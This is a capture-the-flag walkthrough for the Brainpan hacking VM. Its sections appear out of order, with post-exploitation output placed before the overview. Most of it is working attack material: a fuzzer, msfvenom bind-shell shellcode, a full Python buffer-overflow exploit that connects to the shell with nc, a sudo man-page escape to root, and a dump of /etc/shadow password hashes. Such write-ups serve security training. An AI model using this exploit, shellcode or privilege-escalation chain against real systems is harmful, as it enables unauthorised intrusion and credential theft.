anansi tty3 Mon Mar 4 12:17 - 12:17 (00:00)
puck tty3 Mon Mar 4 11:30 - 12:17 (00:47)
puck tty3 Mon Mar 4 11:30 - 11:30 (00:00)
puck tty2 Mon Mar 4 11:07 - 13:38 (02:30)
puck tty2 Mon Mar 4 11:07 - 11:07 (00:00)
anansi tty2 Mon Mar 4 11:03 - 11:07 (00:04)
anansi tty2 Mon Mar 4 11:03 - 11:03 (00:00)
anansi tty2 Mon Mar 4 10:58 - 10:59 (00:01)
anansi tty2 Mon Mar 4 10:58 - 10:58 (00:00)
reynard tty1 Mon Mar 4 10:48 - 13:43 (02:54)
reynard tty1 Mon Mar 4 10:48 - 10:48 (00:00)
# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/
/home/puck/.wine:
total 816K
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r-- 1 puck puck 11 Mar 4 2013 .update-timestamp
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 dosdevices
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 drive_c
-rw-rw-r-- 1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r-- 1 puck puck 26K Nov 19 08:53 user.reg
-rw-rw-r-- 1 puck puck 2.1K Mar 4 2013 userdef.reg
/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck 10 Mar 4 2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck 1 Mar 4 2013 z: -> /
/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 Program Files
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 users
drwxrwxr-x 13 puck puck 4.0K Mar 4 2013 windows
/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 5 puck puck 4.0K Mar 4 2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 Internet Explorer
/home/puck/.wine/drive_c/Program Files/Common Files:
/home/puck/web:
total 816K
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 bin
-rw-rw-r-- 1 puck puck 215 Mar 4 2013 index.html
-rw------- 1 puck puck 797K Mar 4 2013 soss-infographic-final.png
/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar 4 2013 .
drwxrwxr-x 3 puck puck 4.0K Mar 4 2013 ..
-rwxr-xr-x 1 puck puck 21K Mar 4 2013 brainpan.exe
# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python
# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp
# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....
lsof -i:9999
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck 10u IPv4 26008 0t0 TCP *:9999 (LISTEN)
brainpan. 1949 puck 11u IPv4 26008 0t0 TCP *:9999 (LISTEN)
wineserve 1953 puck 27u IPv4 26008 0t0 TCP *:9999 (LISTEN)
lsof -i:10000
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python 926 puck 3u IPv4 8661 0t0 TCP *:webmin (LISTEN)
# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:9999 0.0.0.0:* LISTEN 1756/brainpan.exe
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 924/python
udp 0 0 0.0.0.0:39859 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* - what's this port do?
udp6 0 0 :::22091 :::*
# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz linux_gather_files.sh linux_privesc_check
linux_checksec.sh linux_priv_esc.sh out
puck@brainpan:/home/puck/privesc$
# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.
# RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man
MAN(1) Manual pager utils MAN(1)
NAME
man - an interface to the on-line reference manuals
SYNOPSIS
man [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-m system[,...]] [-M path] [-S list] [-e extension] [-i|-I]
[--regex|--wildcard] [--names-only] [-a] [-u] [--no-subpages] [-P
pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
cation] [-p string] [-t] [-T[device]] [-H[browser]] [-X[dpi]] [-Z]
[[section] page ...] ...
man -k [apropos options] regexp ...
man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
man -f [whatis options] page ...
man -l [-C file] [-d] [-D] [--warnings[=warnings]] [-R encoding] [-L
locale] [-P pager] [-r prompt] [-7] [-E encoding] [-p string] [-t]
[-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
man -w|-W [-C file] [-d] [-D] page ...
man -c [-C file] [-d] [-D] page ...
man [-hV]
DESCRIPTION
Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
man is the system's manual pager. Each page argument given to man is
Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash
# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN MAN PAGE (WHICH WILL RUN AS "ROOT")
!/bin/bash
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#
# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow
root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::
daemon:*:15768:0:99999:7:::
bin:*:15768:0:99999:7:::
sys:*:15768:0:99999:7:::
sync:*:15768:0:99999:7:::
games:*:15768:0:99999:7:::
man:*:15768:0:99999:7:::
lp:*:15768:0:99999:7:::
mail:*:15768:0:99999:7:::
news:*:15768:0:99999:7:::
uucp:*:15768:0:99999:7:::
proxy:*:15768:0:99999:7:::
www-data:*:15768:0:99999:7:::
backup:*:15768:0:99999:7:::
list:*:15768:0:99999:7:::
irc:*:15768:0:99999:7:::
gnats:*:15768:0:99999:7:::
nobody:*:15768:0:99999:7:::
libuuid:!:15768:0:99999:7:::
syslog:*:15768:0:99999:7:::
messagebus:*:15768:0:99999:7:::
reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::
anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::
puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::
`7MN. `7MF'
__, MMN. M
`7MM M YMb M pd""b.
MM M `MN. M (O) `8b
MM M `MM.M ,89
MM M YMM ""Yb.
.JMML..JML. YM 88
(O) .M'
bmmmd'
# OVERVIEW
Brainpan is a test VM solution used for Pentesting/Hacking simulations. For more info, go to http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walk through covers the basic steps to obtain "root" access to brainpan.
# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.132 00:0c:29:90:72:0d 01 060 VMware, Inc.
# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port9999-TCP:V=6.25%I=7%D=11/6%Time=5279FCEC%P=i686-pc-linux-gnu%r(NULL
SF:,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\|\x
SF:20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x2
SF:0\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\x20
SF:\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20
SF:\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\|\x
SF:20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20
SF:_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\x20
SF:\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20_\|
SF:\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\x20
SF:_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\x20
SF:_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x20
SF:THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20>>\x20");
MAC Address: 00:0C:29:90:72:0D (VMware)
# DIRBUSTER
#scan 192.168.1.132:10000 with dirbuster
dirbuster &
# dirbuster shows a static index.html page, a static image file, a bin directory and a brainpan.exe within the brainpan directory.
# DOWNLOAD brainpan.exe
wget http://192.168.1.132/bin/brainpan.exe
# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.
* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS RUNNING IN WINE FOR LINUX ON PORT 9999/TCP ON THE REMOTE HOST...
# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine for debugging using OllyGDB or Immunity Debugger. Find which bytes overwrite EIP, find suitable JMP ESP address. Use msfvenom to create bind shell for Linux using the brainpan IP. Create working buffer overflow exploit (see below).
# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122
import socket
target = "192.168.1.119"
# 1024 bit unique string
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"
print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers#
msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134
[*] Exact match at offset 524
* This means from 524-528 bytes, EIP is overwritten...
# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"
# CREATE THE EXPLOIT...
# brainpan_exploit.py by 1N3 - 20131121
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
# bmmmd'
#
#
#!/usr/bin/python
import socket
import os
import subprocess
# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520
ebp = '\x90' * 4
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
command = "nc -vv 192.168.1.132 4444"
#shellcode bind shell port 4444 192.168.1.132
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")
# NOOP sled
NOOP_sled = '\x90' * 104
# construct entire buffer - 1004 bytes
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode
print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
subprocess.call(command)
os.system(command)
print "Done..."
s.close()
exit
# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� 1�����������������������������������������������������������������������������������������������������������t$���d�Z)ɱ 1Z Z �� 8�UlK �����\����g�
~T�o�2��{J � n�h�tnV ���k*#Y ��eG��"��ߡe{$ �KQj�6�
Done...
Connecting to bind shell...
nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web
# DISTRO VERSION
cat /etc/release
Ubuntu 12.10
uname -a
Linux version 3.5.0-25-generic
# PROCESSES
ps -auxxx
root 732 1 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
root 838 732 0 06:47 ? 00:00:00 /usr/sbin/winbindd -F
...
...
puck 910 909 0 06:47 ? 00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck 911 910 0 06:47 ? 00:00:00 /bin/bash /home/puck/checksrv.sh
puck 926 911 0 06:47 ? 00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck 1693 1 0 08:49 ? 00:00:00 /bin//sh
puck 1949 1 0 08:53 ? 00:00:00 /home/puck/web/bin/brainpan.exe
puck 1953 1 0 08:53 ? 00:00:00 /usr/bin/wineserver
puck 1959 1 0 08:53 ? 00:00:00 C:\windows\system32\services.exe
puck 1963 1 0 08:53 ? 00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck 1972 1 0 08:53 ? 00:00:00 C:\windows\system32\plugplay.exe
# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h dom mon dow command
* * * * * /home/puck/checksrv.sh
# SHOW LAST USERS TO LOGIN
#
last
root tty1 Mon Mar 4 13:43 - 13:43 (00:00)
anansi tty3 Mon Mar 4 12:17 - 13:38 (01:20)
anansi tty3 Mon Mar 4 12:17 - 12:17 (00:00)
puck tty3 Mon Mar 4 11:30 - 12:17 (00:47)
puck tty3 Mon Mar 4 11:30 - 11:30 (00:00)
puck tty2 Mon Mar 4 11:07 - 13:38 (02:30)
puck tty2 Mon Mar 4 11:07 - 11:07 (00:00)
anansi tty2 Mon Mar 4 11:03 - 11:07 (00:04)
anansi tty2 Mon Mar 4 11:03 - 11:03 (00:00)
anansi tty2 Mon Mar 4 10:58 - 10:59 (00:01)
